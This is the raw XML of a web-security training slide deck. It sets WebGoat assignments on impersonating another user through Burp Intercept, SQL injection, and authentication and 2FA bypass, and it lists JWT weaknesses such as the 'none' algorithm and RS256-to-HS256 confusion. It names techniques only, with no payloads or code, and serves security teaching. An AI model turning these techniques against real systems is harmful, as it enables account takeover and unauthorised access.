              <a:t>Use Multi Level Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> send the credentials of a particular user but get authenticated as another user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try Burp Intercept and change name parameter]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417800730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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#19a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection Intro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> lesson #9   crack the solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pay loads]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38288572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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{369AF0A6-8F06-44D1-AA6C-728A4381B2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733550" y="204787"/>
            <a:ext cx="8324850" cy="5457825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176589372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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#19b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerable application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Try authentication by pass attack  2FA authentication vulnerability  crack secret questions and change your password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try burp intercept, repeater]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170926944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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JWT – JSON WEB TOKENS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is JWT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why are they used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where are they used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parts of a JWT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JWT uses Base64url encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debugging JWT token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jwt.io/#debugger.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88093642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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JWT – JSON WEB TOKENS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerabilities in JWT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application doesn’t verify signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      NONE algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from RS256 to HS256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="700" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180212166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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
